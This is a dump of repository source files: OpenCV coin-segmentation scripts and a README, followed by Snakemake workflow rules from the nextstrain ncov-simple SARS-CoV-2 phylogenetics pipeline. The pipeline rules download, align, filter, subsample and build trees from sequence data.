sure background is not 0, but 1\nmarkers = markers+1\n# Now, mark the region of unknown with zero\nmarkers[unknown==255] = 0\n\n\nmarkers = markers.astype(np.int32)\nmarkers = cv.watershed(img,markers)\nimg[markers == -1] = [0,0,255]\nimg2=color.label2rgb(markers,bg_label=0)\n\n\ncv.imshow('Segmentated Image',img2)\ncv.imshow(\"thresh\", sure_fg)\ncv.imshow(\"contours\", img)\ncv.waitKey(0)" }, { "alpha_fraction": 0.671832263469696, "alphanum_fraction": 0.716955304145813, "avg_line_length": 29.91549301147461, "blob_id": "3b4357cd6709203cb747dc8286f5886b7405d4ec", "content_id": "29d8b838ecdfc56c130b2c11268a9252c118a359", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2194, "license_type": "no_license", "max_line_length": 125, "num_lines": 71, "path": "/thresholding_segmentation.py", "repo_name": "ilkerkuss/OpenCV-Count-and-Detect-Coin", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nfrom skimage import filters\n\n\n\nimage=cv2.imread(r\"C:\\Users\\W10\\Desktop\\coin4.jpg\")\n#image = cv2.resize(img,(400,400),interpolation=cv2.INTER_AREA)\ncv2.imshow(\"Original\",image)\ncv2.waitKey(0)\n\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nblurred = cv2.GaussianBlur(gray,(9,9),0) # blur with standard deviation sigma = 9\ncv2.imshow(\"Blurred\",blurred)\ncv2.waitKey(0)\n\n#Simple edge detection with canny filter\n'''\nedge = cv2.Canny(blurred,30,150) \ncv2.imshow(\"Canny_edged\",edge)\ncv2.waitKey(0)\n'''\n\n#If image need closing operation this codes may use\n'''\nkernel = np.ones((5,5),np.uint8)\nclosed=closing = cv2.morphologyEx(edge, cv2.MORPH_CLOSE, kernel,iterations=1)\ncv2.imshow(\"close\",closed)\ncv2.waitKey(0)\n'''\n\n# Different thresholding operations\n'''\nret,thresh=cv2.threshold(gray, 200, 255,cv2.THRESH_BINARY_INV)\ncv2.imshow(\"thresh\",thresh)\ncv2.waitKey(0)\n'''\n\nret, thresh2 = cv2.threshold(gray,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\ncv2.imshow(\"thresh2\",thresh2)\ncv2.waitKey(0)\n\n(cnts,_) = cv2.findContours(thresh2,cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\nprint(\"Belirlenen Madeni Para : {} \".format(len(cnts)))\n\n\ncoins = image.copy()\n\nfor i in range(0,len(cnts)):\n cv2.drawContours(coins,cnts,i,(0,255,0),2)\n cv2.imshow(\"Coins\",coins)\n cv2.waitKey(0)\n\n\n#Show all contoured coins one by one , if u want to see all coins one by one you can uncomment the code lines\n'''\nfor (i, c) in enumerate(cnts):# we are iterating through our contours\n (x, y, w, h) = cv2.boundingRect(c) # x and y are starting point of rectangle in first contours\n\n print(\"Coin #{}\".format(i + 1))\n coin = image[y:y + h, x:x + w] #cropping image as same height and width as the contours\n cv2.imshow(\"Coin\", coin)\n\n mask = np.zeros(image.shape[:2], dtype = \"uint8\") #initialising mask of same height and width as image\n ((centerX, centerY), radius) = cv2.minEnclosingCircle(c) # extracting the centre of circle and radius of the circle\n cv2.circle(mask, (int(centerX), int(centerY)), int(radius),255, -1) #\n mask = mask[y:y + h, x:x + w]\n cv2.imshow(\"Masked Coin\", cv2.bitwise_and(coin, coin, mask = mask)) # finally applying the AND operation on coins using mask\n cv2.waitKey(0)\n'''" }, { "alpha_fraction": 0.795918345451355, "alphanum_fraction": 0.8027210831642151, "avg_line_length": 72.5, "blob_id": "113908b5c17a1538afa130cfeca9d6a16b22b8bf", "content_id": "aa8160e1d67ddfbe90c3351377476fbe706a2171", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 147, "license_type": "no_license", "max_line_length": 115, "num_lines": 2, "path": "/README.md", "repo_name": "ilkerkuss/OpenCV-Count-and-Detect-Coin", "src_encoding": "UTF-8", "text": "# OpenCV Count and Detect Coin\n A program that detects coins with 2 different segmentation ways. It shows all segmented coins and count the coins.\n" } ]
3
nextstrain/ncov-simple
https://github.com/nextstrain/ncov-simple
0f85d57b19a669c2061d8efe8c524615e210ebdf
b91a69424f4d470ada2131c6fae1822c3a7109af
7ebab55ce36160f4f4ea952e9ce7c22c6029c610
refs/heads/master
2023-08-15T01:13:22.579538
2021-10-05T15:24:11
2021-10-05T15:24:11
356,594,441
1
1
null
2021-04-10T13:46:27
2021-05-19T20:28:44
2021-05-19T20:41:03
Python
[ { "alpha_fraction": 0.653915286064148, "alphanum_fraction": 0.6544287800788879, "avg_line_length": 37.939998626708984, "blob_id": "c66fdf4f867481a426e010ac0a740a3af99d1a2b", "content_id": "409f596f249550b08167b671f2c3235bfe29b1b2", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3895, "license_type": "permissive", "max_line_length": 244, "num_lines": 100, "path": "/workflow/snakemake_rules/reference_build.smk", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "'''\nThis part of the workflow downloads reference data sets\n\n - \"reference-datasets/{build_name}/sequences.fasta\"\n - \"reference-datasets/{build_name}/metadata.tsv\"\n\nand combines them with custom data to produce\n\n - builds/{build_name}/sequences.fasta\n - builds/{build_name}/metadata.tsv\n\n'''\nrule prepare_reference_build:\n input:\n sequences = \"builds/{build_name}/sequences.fasta\",\n metadata = \"builds/{build_name}/metadata.tsv\"\n\n\ndef _infer_decompression(input):\n \"\"\"\n Returns a shell command to decompress the piped stream,\n which will itself produce a stream of decompressed data to stdout.\n If no decompression is needed, returns `cat`.\n NOTE: a lot of this will become unnecessary once `augur` handles\n compressed sequence inputs.\n \"\"\"\n if input.endswith(\".xz\"):\n return \"xz -dcq\"\n if input.endswith(\".gz\"):\n return \"gunzip -cq\"\n return \"cat\"\n\n\nrule download:\n message: \"Downloading reference sequences and metadata\"\n output:\n sequences = \"reference-datasets/{build_name}/sequences.fasta\",\n metadata = \"reference-datasets/{build_name}/metadata.fasta\"\n params:\n meta = lambda w: config[\"builds\"][w.build_name][\"reference_metadata\"],\n seq = lambda w: config[\"builds\"][w.build_name][\"reference_sequences\"],\n deflate_seq = lambda w: _infer_decompression(config[\"builds\"][w.build_name][\"reference_metadata\"]),\n deflate_meta = lambda w: _infer_decompression(config[\"builds\"][w.build_name][\"reference_sequences\"])\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n curl {params.meta} | {params.deflate_meta} > {output.metadata:q}\n curl {params.seq} | {params.deflate_seq} > {output.sequences:q}\n \"\"\"\n\n\nrule combine_input_metadata:\n # this rule is intended to be run _only_ if we have defined multiple inputs (\"origins\")\n message:\n \"\"\"\n Combining metadata files {input.ref_metadata} and {input.user_metadata} and adding columns to represent origin\n \"\"\"\n input:\n ref_metadata = rules.download.output.metadata,\n user_metadata = lambda w: config[\"builds\"][w.build_name][\"user_metadata\"]\n output:\n metadata = rules.prepare_reference_build.input.metadata\n log:\n \"logs/combine_input_metadata_{build_name}.txt\"\n benchmark:\n \"benchmarks/combine_input_metadata_{build_name}.txt\"\n run:\n import pandas as pd\n\n ref_meta = pd.read_csv(input.ref_metadata, sep='\\t')\n ref_meta[\"source\"] = \"background\"\n\n user_metadata_files = [input.user_metadata] if type(input.user_metadata)==str else input.user_metadata\n user_metadata = []\n for fname in user_metadata_files:\n tmp = pd.read_csv(fname, sep=None)\n tmp['source'] = \"foreground\"\n user_metadata.append(tmp)\n\n combined_meta = pd.concat([ref_meta]+user_metadata, axis=0).fillna(\"?\").drop_duplicates(subset=\"strain\", keep='first')\n combined_meta.to_csv(output.metadata, sep='\\t')\n\n\nrule combine_sequences:\n # Similar to rule combine_input_metadata, this rule should only be run if multiple inputs are being used (i.e. multiple origins)\n message:\n \"\"\"\n Combine and deduplicate aligned & filtered FASTAs from multiple origins in preparation for subsampling: {input}.\n \"\"\"\n input:\n lambda w: [f\"reference-datasets/{w.build_name}/sequences.fasta\"] + ([config[\"builds\"][w.build_name][\"user_sequences\"]] if type(config[\"builds\"][w.build_name][\"user_sequences\"])==str else config[\"builds\"][w.build_name][\"user_sequences\"])\n output:\n rules.prepare_reference_build.input.sequences\n benchmark:\n \"benchmarks/combine_sequences_{build_name}.txt\"\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/combine-and-dedup-fastas.py --input {input} --output {output}\n \"\"\"\n\n" }, { "alpha_fraction": 0.633582592010498, "alphanum_fraction": 0.6349422335624695, "avg_line_length": 46.45161437988281, "blob_id": "f1aac410308e654c0f31800c4bd8fe248d250be4", "content_id": "d70a289a557b7645b1238cb02f5740fc360cdb15", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1471, "license_type": "permissive", "max_line_length": 131, "num_lines": 31, "path": "/workflow/snakemake_rules/templated_build.smk", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "'''\nThis file generated the build configurations for the templated builds\n'''\n\nfrom itertools import product\n\nfor templated_build in config[\"templated-builds\"].values():\n patterns = templated_build[\"build_patterns\"]\n subsamples = templated_build[\"subsamples\"]\n metadata_adjustments = templated_build.get(\"metadata_adjustments\",{})\n\n for build_vars in product(*[x.items() for x in patterns.values()]):\n build_name_params = {k:v[0] for k,v in zip(patterns.keys(), build_vars)}\n build_params = {k:v[1] for k,v in zip(patterns.keys(), build_vars)}\n build_params.update({k:eval(v.format(**build_params)) for k,v in templated_build.get('subsampling_parameters',{}).items()})\n\n build_name = templated_build[\"build_name\"].format(**build_name_params)\n\n tmp = {}\n for subsample in subsamples:\n tmp[subsample] = {}\n tmp[subsample][\"filters\"] = subsamples[subsample][\"filters\"].format(**build_params)\n if \"priorities\" in subsamples[subsample]:\n tmp[subsample][\"priorities\"] = subsamples[subsample][\"priorities\"].format(**build_params)\n config['builds'][build_name] = {'subsamples': tmp}\n\n tmp = []\n for adjustment in metadata_adjustments:\n tmp.append({\"query\": adjustment[\"query\"].format(**build_params),\n \"src\": adjustment[\"src\"], \"dst\": adjustment[\"dst\"]})\n config['builds'][build_name]['metadata_adjustments'] = tmp\n" }, { "alpha_fraction": 0.5978711843490601, "alphanum_fraction": 0.6021564602851868, "avg_line_length": 32.3317985534668, "blob_id": "11ae798b2ac398260d43d8ad11a7b7d887fa7252", "content_id": "aabf406ba0b9d40f9ede98a6391ad765e04b9b43", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7234, "license_type": "permissive", "max_line_length": 129, "num_lines": 217, "path": "/workflow/snakemake_rules/preprocess.smk", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "'''\nThis part of the workflow downloads files from S3\n\n - \"data/{origin}/sequences.fasta.gz\"\n - \"data/{origin}/metadata.tsv\"\n\nand produces\n\n - pre-processed/filtered.fasta.xz\n - pre-processed/metadata.tsv\n\n'''\n\nimport os\nlocalrules: download_sequences, download_metadata, download_exclude\n\nrule preprocess:\n input:\n sequences = \"pre-processed/filtered.fasta.xz\",\n metadata = \"pre-processed/metadata.tsv\",\n sequence_index = \"pre-processed/sequence_index.tsv\"\n\n\n\ndef _infer_decompression(input):\n \"\"\"\n Returns a shell command to decompress the piped stream,\n which will itself produce a stream of decompressed data to stdout.\n If no decompression is needed, returns `cat`.\n NOTE: a lot of this will become unnecessary once `augur` handles\n compressed sequence inputs.\n \"\"\"\n if input.endswith(\".xz\"):\n return \"xz -dcq\"\n if input.endswith(\".gz\"):\n return \"gunzip -cq\"\n return \"cat\"\n\nrule download_sequences:\n message: \"Downloading sequences from {params.address} -> {output[0]}\"\n params:\n address = lambda w: config['origins'][w.origin]['sequences']\n output:\n \"data/{origin}/sequences.fasta.gz\"\n shell: \"aws s3 cp {params.address} {output}\"\n\nrule download_metadata:\n message: \"Downloading metadata from {params.address} -> {output}\"\n params:\n deflate = lambda w: _infer_decompression(config['origins'][w.origin]['metadata']),\n address = lambda w: config['origins'][w.origin]['metadata']\n output:\n metadata = \"data/{origin}/metadata.tsv\"\n shell: \"aws s3 cp {params.address} - | {params.deflate} {input} > {output:q}\"\n\nrule download_exclude:\n message: \"Downloading exclude from {input} -> {output}\"\n output:\n \"data/{origin}/exclude.txt\"\n params:\n source = lambda w: config[\"origins\"][w.origin]['exclude']\n shell: \"curl {params.source} -o {output}\"\n\nrule prealign:\n message:\n \"\"\"\n Aligning sequences to {input.reference}\n - gaps relative to reference are considered real\n \"\"\"\n input:\n sequences = \"data/{origin}/sequences.fasta.gz\",\n genemap = config[\"files\"][\"annotation\"],\n reference = config[\"files\"][\"alignment_reference\"]\n output:\n alignment = \"pre-processed/{origin}/alignment.fasta.xz\",\n insertions = \"pre-processed/{origin}/insertions.tsv\",\n translations = expand(\"pre-processed/{{origin}}/translations/seqs.gene.{gene}.fasta.xz\", gene=config.get('genes', ['S']))\n params:\n outdir = \"pre-processed/{origin}/translations\",\n genes = ','.join(config.get('genes', ['S'])),\n basename = \"seqs\",\n tmp_alignment = \"pre-processed/{origin}/alignment.fasta\",\n deflate = lambda w: _infer_decompression(\".gz\")\n log:\n \"logs/prealign_{origin}.txt\"\n benchmark:\n \"benchmarks/align_{origin}.txt\"\n conda: config[\"conda_environment\"]\n threads: 8\n resources:\n mem_mb=3000\n shell:\n \"\"\"\n {params.deflate} {input.sequences} | nextalign \\\n --jobs={threads} \\\n --reference {input.reference} \\\n --genemap {input.genemap} \\\n --genes {params.genes} \\\n --sequences /dev/stdin \\\n --output-dir {params.outdir} \\\n --output-basename {params.basename} \\\n --output-fasta {params.tmp_alignment} \\\n --output-insertions {output.insertions} &&\\\n\t xz -2 {params.tmp_alignment} &&\\\n xz -2 {params.outdir}/*fasta\n \"\"\"\n\nrule filter:\n message:\n \"\"\"\n Filtering alignment {input.sequences} -> {output.sequences}\n - excluding strains in {input.exclude}\n - including strains in {input.include}\n \"\"\"\n input:\n sequences = \"pre-processed/{origin}/alignment.fasta.xz\",\n metadata = \"data/{origin}/metadata.tsv\",\n include = \"defaults/include.txt\",\n exclude = \"data/{origin}/exclude.txt\"\n output:\n sequences = \"pre-processed/{origin}/filtered.fasta.xz\"\n log:\n \"logs/filtered{origin}.txt\"\n benchmark:\n \"benchmarks/filter{origin}.txt\"\n params:\n filter_arguments = lambda w: config[\"origins\"][w.origin].get(\"filters\",\"\"),\n tmp_alignment = \"pre-processed/{origin}/filtered.fasta\"\n resources:\n # Memory use scales primarily with the size of the metadata file.\n mem_mb=lambda wildcards, input: 15 * int(input.metadata.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur filter \\\n --sequences {input.sequences} \\\n --metadata {input.metadata} \\\n --include {input.include} \\\n --exclude {input.exclude} \\\n {params.filter_arguments} \\\n --output {params.tmp_alignment} 2>&1 | tee {log};\n xz -2 {params.tmp_alignment}\n \"\"\"\n\n\nrule combine_bulk_sequences:\n input:\n sequences = [f\"pre-processed/{origin}/filtered.fasta.xz\" for origin in config[\"origins\"]],\n mutation_summary = [f\"pre-processed/{origin}/mutation_summary.tsv\" for origin in config[\"origins\"]]\n output:\n rules.preprocess.input.sequences\n run:\n if len(input.sequences)==1:\n shell(f\"cp {input.sequences} {output}\")\n\nrule combine_bulk_metadata:\n input:\n [f\"data/{origin}/metadata.tsv\" for origin in config[\"origins\"]]\n output:\n rules.preprocess.input.metadata\n run:\n if len(input)==1:\n shell(f\"cp {input} {output}\")\n\nrule index_sequences:\n message:\n \"\"\"\n Index sequence composition for faster filtering.\n \"\"\"\n input:\n sequences = rules.combine_bulk_sequences.output\n output:\n sequence_index = rules.preprocess.input.sequence_index\n log:\n \"logs/index_sequences.txt\"\n benchmark:\n \"benchmarks/index_sequences.txt\"\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur index \\\n --sequences {input.sequences} \\\n --output {output.sequence_index} 2>&1 | tee {log}\n \"\"\"\n\n\nrule mutation_summary:\n message: \"Summarizing {input.alignment}\"\n input:\n alignment = rules.prealign.output.alignment,\n insertions = rules.prealign.output.insertions,\n translations = rules.prealign.output.translations,\n reference = config[\"files\"][\"alignment_reference\"],\n genemap = config[\"files\"][\"annotation\"]\n output:\n mutation_summary = \"pre-processed/{origin}/mutation_summary.tsv\"\n log:\n \"logs/mutation_summary_{origin}.txt\"\n benchmark:\n \"benchmarks/mutation_summary_{origin}.txt\"\n params:\n outdir = \"pre-processed/{origin}/translations\",\n basename = \"seqs\",\n genes=config[\"genes\"],\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/mutation_summary.py \\\n --alignment {input.alignment} \\\n --insertions {input.insertions} \\\n --directory {params.outdir} \\\n --basename {params.basename} \\\n --reference {input.reference} \\\n --genes {params.genes:q} \\\n --genemap {input.genemap} \\\n --output {output.mutation_summary} 2>&1 | tee {log}\n \"\"\"\n\n" }, { "alpha_fraction": 0.5942004919052124, "alphanum_fraction": 0.6013255715370178, "avg_line_length": 34.91071319580078, "blob_id": "9a0758f1bf25e16d8fdcdafb89ee304497d73b17", "content_id": "9adf1ec1f69176b928884539269f1ed5a8890d80", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6035, "license_type": "permissive", "max_line_length": 138, "num_lines": 168, "path": "/workflow/snakemake_rules/subsampling.smk", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "'''\nThis part of the workflow starts from files\n\n - pre-processed/sequences.fasta\n - pre-processed/metadata.tsv\n\nand produces files\n\n - builds/{build_name}/sequences.fasta\n - builds/{build_name}/metadata.tsv\n\n'''\n\nbuild_dir = config.get(\"build_dir\", \"builds\")\n\nrule prepare_build:\n input:\n sequences = build_dir + \"/{build_name}/sequences.fasta\",\n metadata = build_dir + \"/{build_name}/metadata.tsv\"\n\ndef _get_priority_file(w):\n if \"priorities\" in config[\"builds\"][w.build_name][\"subsamples\"][w.subsample]:\n return build_dir + f\"/{w.build_name}/priorities_{config['builds'][w.build_name]['subsamples'][w.subsample].get('priorities')}.tsv\"\n else:\n return []\n\ndef _get_priority_argument(w):\n f = _get_priority_file(w)\n if f:\n return \"--priority \" + f\n else:\n return \"\"\n\nrule subsample:\n message:\n \"\"\"\n Subsample all sequences by '{wildcards.subsample}' scheme for build '{wildcards.build_name}' with the following parameters:\n \"\"\"\n input:\n sequences = \"pre-processed/filtered.fasta.xz\",\n metadata = \"pre-processed/metadata.tsv\",\n sequence_index = \"pre-processed/sequence_index.tsv\",\n include = config[\"files\"][\"include\"],\n priorities = _get_priority_file\n output:\n sequences = build_dir + \"/{build_name}/sample-{subsample}.fasta\",\n strains=build_dir + \"/{build_name}/sample-{subsample}.txt\",\n log:\n \"logs/subsample_{build_name}_{subsample}.txt\"\n benchmark:\n \"benchmarks/subsample_{build_name}_{subsample}.txt\"\n params:\n filter_arguments = lambda w: config[\"builds\"][w.build_name][\"subsamples\"][w.subsample]['filters'],\n priorities = _get_priority_argument\n resources:\n # Memory use scales primarily with the size of the metadata file.\n mem_mb=lambda wildcards, input: 15 * int(input.metadata.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur filter \\\n --sequences {input.sequences} \\\n --metadata {input.metadata} \\\n --sequence-index {input.sequence_index} \\\n --include {input.include} \\\n {params.filter_arguments} \\\n {params.priorities} \\\n --output {output.sequences} \\\n --output-strains {output.strains} 2>&1 | tee {log}\n \"\"\"\n\nrule proximity_score:\n message:\n \"\"\"\n determine priority for inclusion in as phylogenetic context by\n genetic similiarity to sequences in focal set for build '{wildcards.build_name}'.\n \"\"\"\n input:\n alignment = \"pre-processed/filtered.fasta.xz\",\n reference = config[\"files\"][\"alignment_reference\"],\n focal_alignment = build_dir + \"/{build_name}/sample-{focus}.fasta\"\n output:\n proximities = build_dir + \"/{build_name}/proximity_{focus}.tsv\"\n log:\n \"logs/subsampling_proximity_{build_name}_{focus}.txt\"\n benchmark:\n \"benchmarks/proximity_score_{build_name}_{focus}.txt\"\n params:\n chunk_size=10000,\n ignore_seqs = config['refine']['root']\n resources:\n # Memory scales at ~0.15 MB * chunk_size (e.g., 0.15 MB * 10000 = 1.5GB).\n mem_mb=4000\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/get_distance_to_focal_set.py \\\n --reference {input.reference} \\\n --alignment {input.alignment} \\\n --focal-alignment {input.focal_alignment} \\\n --ignore-seqs {params.ignore_seqs} \\\n --chunk-size {params.chunk_size} \\\n --output {output.proximities} 2>&1 | tee {log}\n \"\"\"\n\nrule priority_score:\n input:\n proximity = rules.proximity_score.output.proximities,\n sequence_index = rules.index_sequences.output.sequence_index,\n output:\n priorities = build_dir + \"/{build_name}/priorities_{focus}.tsv\"\n benchmark:\n \"benchmarks/priority_score_{build_name}_{focus}.txt\"\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/priorities.py \\\n --sequence-index {input.sequence_index} \\\n --proximities {input.proximity} \\\n --output {output.priorities} 2>&1 | tee {log}\n \"\"\"\n\n\nrule combine_subsamples:\n # Similar to rule combine_input_metadata, this rule should only be run if multiple inputs are being used (i.e. multiple origins)\n message:\n \"\"\"\n Combine and deduplicate aligned & filtered FASTAs from multiple origins in preparation for subsampling: {input}.\n \"\"\"\n input:\n lambda w: [build_dir + f\"/{w.build_name}/sample-{subsample}.fasta\"\n for subsample in config[\"builds\"][w.build_name][\"subsamples\"]]\n output:\n rules.prepare_build.input.sequences\n benchmark:\n \"benchmarks/combine_subsamples_{build_name}.txt\"\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/combine-and-dedup-fastas.py --input {input} --output {output}\n \"\"\"\n\n\nrule extract_metadata:\n input:\n strains = lambda w: [build_dir + f\"/{w.build_name}/sample-{subsample}.txt\"\n for subsample in config[\"builds\"][w.build_name][\"subsamples\"]],\n metadata = \"pre-processed/metadata.tsv\"\n output:\n metadata = rules.prepare_build.input.metadata\n params:\n adjust = lambda w: config[\"builds\"][w.build_name].get(\"metadata_adjustments\",{}),\n benchmark:\n \"benchmarks/extract_metadata_{build_name}.txt\"\n run:\n import pandas as pd\n strains = set()\n for f in input.strains:\n with open(f) as fh:\n strains.update([x.strip() for x in fh if x[0]!='#'])\n\n d = pd.read_csv(input.metadata, index_col=0, sep='\\t').loc[list(strains)]\n if len(params.adjust):\n for adjustment in params.adjust:\n ind = d.eval(adjustment[\"query\"])\n d.loc[ind, adjustment['dst']] = d.loc[ind, adjustment['src']]\n\n d.to_csv(output.metadata, sep='\\t')\n\n\n" }, { "alpha_fraction": 0.5736980438232422, "alphanum_fraction": 0.5830396413803101, "avg_line_length": 37.1987190246582, "blob_id": "4680030dd09b5fb53a3e6ffa721a9ee3b90e428c", "content_id": "6fb9fec29e0932c1d0c149013e04d22a9bb7d122", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17877, "license_type": "permissive", "max_line_length": 150, "num_lines": 468, "path": "/workflow/snakemake_rules/core.smk", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "'''\nThis part of the workflow starts from files\n\n - builds/{build_name}/sequences.fasta\n - builds/{build_name}/metadata.tsv\n\nand produces files\n\n - auspice/ncov_{build_name}.json\n - auspice/ncov_{build_name}-tip-frequencies.json\n - auspice/ncov_{build_name}-root-sequence.json\n\n'''\n\nbuild_dir = config.get(\"build_dir\", \"builds\")\nauspice_dir = config.get(\"auspice_dir\", \"auspice\")\nauspice_prefix = config.get(\"auspice_prefix\", \"ncov\")\n\nrule align:\n message:\n \"\"\"\n Aligning sequences to {input.reference}\n - gaps relative to reference are considered real\n \"\"\"\n input:\n sequences = build_dir + \"/{build_name}/sequences.fasta\",\n genemap = config[\"files\"][\"annotation\"],\n reference = config[\"files\"][\"alignment_reference\"]\n output:\n alignment = build_dir + \"/{build_name}/aligned.fasta\",\n insertions = build_dir + \"/{build_name}/insertions.tsv\",\n translations = expand(build_dir + \"/{{build_name}}/translations/aligned.gene.{gene}.fasta\", gene=config.get('genes', ['S']))\n params:\n outdir = build_dir + \"/{build_name}/translations\",\n genes = ','.join(config.get('genes', ['S'])),\n basename = \"aligned\"\n log:\n \"logs/align_{build_name}.txt\"\n benchmark:\n \"benchmarks/align_{build_name}.txt\"\n conda: config[\"conda_environment\"]\n threads: 4\n resources:\n mem_mb=3000\n shell:\n \"\"\"\n nextalign \\\n --jobs={threads} \\\n --reference {input.reference} \\\n --genemap {input.genemap} \\\n --genes {params.genes} \\\n --sequences {input.sequences} \\\n --output-dir {params.outdir} \\\n --output-basename {params.basename} \\\n --output-fasta {output.alignment} \\\n --output-insertions {output.insertions} > {log} 2>&1\n \"\"\"\n\n\nrule mask:\n message:\n \"\"\"\n Mask bases in alignment {input.alignment}\n - masking {params.mask_arguments}\n \"\"\"\n input:\n alignment = rules.align.output.alignment\n output:\n alignment = build_dir + \"/{build_name}/masked.fasta\",\n log:\n \"logs/mask_{build_name}.txt\"\n benchmark:\n \"benchmarks/mask_{build_name}.txt\"\n params:\n mask_arguments = lambda w: config.get(\"mask\",\"\")\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/mask-alignment.py \\\n --alignment {input.alignment} \\\n {params.mask_arguments} \\\n --output {output.alignment} 2>&1 | tee {log}\n \"\"\"\n\nrule tree:\n message: \"Building tree\"\n input:\n alignment = rules.mask.output.alignment\n output:\n tree = build_dir + \"/{build_name}/tree_raw.nwk\"\n params:\n args = lambda w: config[\"tree\"].get(\"tree-builder-args\",\"\") if \"tree\" in config else \"\"\n log:\n \"logs/tree_{build_name}.txt\"\n benchmark:\n \"benchmarks/tree_{build_name}.txt\"\n threads: 8\n resources:\n # Multiple sequence alignments can use up to 40 times their disk size in\n # memory, especially for larger alignments.\n # Note that Snakemake >5.10.0 supports input.size_mb to avoid converting from bytes to MB.\n mem_mb=lambda wildcards, input: 40 * int(input.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur tree \\\n --alignment {input.alignment} \\\n --tree-builder-args {params.args} \\\n --output {output.tree} \\\n --nthreads {threads} 2>&1 | tee {log}\n \"\"\"\n\nrule refine:\n message:\n \"\"\"\n Refining tree\n - estimate timetree\n - use {params.coalescent} coalescent timescale\n - estimate {params.date_inference} node dates\n \"\"\"\n input:\n tree = rules.tree.output.tree,\n alignment = rules.mask.output.alignment,\n metadata = build_dir + \"/{build_name}/metadata.tsv\"\n output:\n tree = build_dir + \"/{build_name}/tree.nwk\",\n node_data = build_dir + \"/{build_name}/branch_lengths.json\"\n log:\n \"logs/refine_{build_name}.txt\"\n benchmark:\n \"benchmarks/refine_{build_name}.txt\"\n threads: 1\n resources:\n # Multiple sequence alignments can use up to 15 times their disk size in\n # memory.\n # Note that Snakemake >5.10.0 supports input.size_mb to avoid converting from bytes to MB.\n mem_mb=lambda wildcards, input: 15 * int(input.size / 1024 / 1024)\n params:\n root = config[\"refine\"][\"root\"],\n clock_rate = config[\"refine\"].get(\"clock_rate\", 0.0007),\n clock_std_dev = config[\"refine\"].get(\"clock_std_dev\", 0.003),\n coalescent = config[\"refine\"].get(\"coalescent\", \"opt\"),\n date_inference = config[\"refine\"].get(\"date_inference\", 'marginal'),\n divergence_unit = config[\"refine\"].get(\"divergence_unit\", 'mutations'),\n clock_filter_iqd = config[\"refine\"].get(\"clock_filter_iqd\", 4),\n keep_polytomies = \"--keep-polytomies\" if config[\"refine\"].get(\"keep_polytomies\", False) else \"\",\n timetree = \"\" if config[\"refine\"].get(\"no_timetree\", False) else \"--timetree\"\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur refine \\\n --tree {input.tree} \\\n --alignment {input.alignment} \\\n --metadata {input.metadata} \\\n --output-tree {output.tree} \\\n --output-node-data {output.node_data} \\\n --root {params.root} \\\n {params.timetree} \\\n {params.keep_polytomies} \\\n --clock-rate {params.clock_rate} \\\n --clock-std-dev {params.clock_std_dev} \\\n --coalescent {params.coalescent} \\\n --date-inference {params.date_inference} \\\n --divergence-unit {params.divergence_unit} \\\n --date-confidence \\\n --no-covariance \\\n --clock-filter-iqd {params.clock_filter_iqd} 2>&1 | tee {log}\n \"\"\"\n\nrule ancestral:\n message:\n \"\"\"\n Reconstructing ancestral sequences and mutations\n - inferring ambiguous mutations\n \"\"\"\n input:\n tree = rules.refine.output.tree,\n alignment = rules.mask.output.alignment\n output:\n node_data = build_dir + \"/{build_name}/nt_muts.json\"\n log:\n \"logs/ancestral_{build_name}.txt\"\n benchmark:\n \"benchmarks/ancestral_{build_name}.txt\"\n params:\n inference = config[\"ancestral\"][\"inference\"]\n resources:\n # Multiple sequence alignments can use up to 15 times their disk size in\n # memory.\n # Note that Snakemake >5.10.0 supports input.size_mb to avoid converting from bytes to MB.\n mem_mb=lambda wildcards, input: 15 * int(input.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur ancestral \\\n --tree {input.tree} \\\n --alignment {input.alignment} \\\n --output-node-data {output.node_data} \\\n --inference {params.inference} \\\n --infer-ambiguous 2>&1 | tee {log}\n \"\"\"\n\nrule translate:\n message: \"Translating amino acid sequences\"\n input:\n tree = rules.refine.output.tree,\n node_data = rules.ancestral.output.node_data,\n reference = config[\"files\"][\"reference\"]\n output:\n node_data = build_dir + \"/{build_name}/aa_muts.json\"\n log:\n \"logs/translate_{build_name}.txt\"\n benchmark:\n \"benchmarks/translate_{build_name}.txt\"\n resources:\n # Memory use scales primarily with size of the node data.\n mem_mb=lambda wildcards, input: 3 * int(input.node_data.size / 1024 / 1024)\n conda: 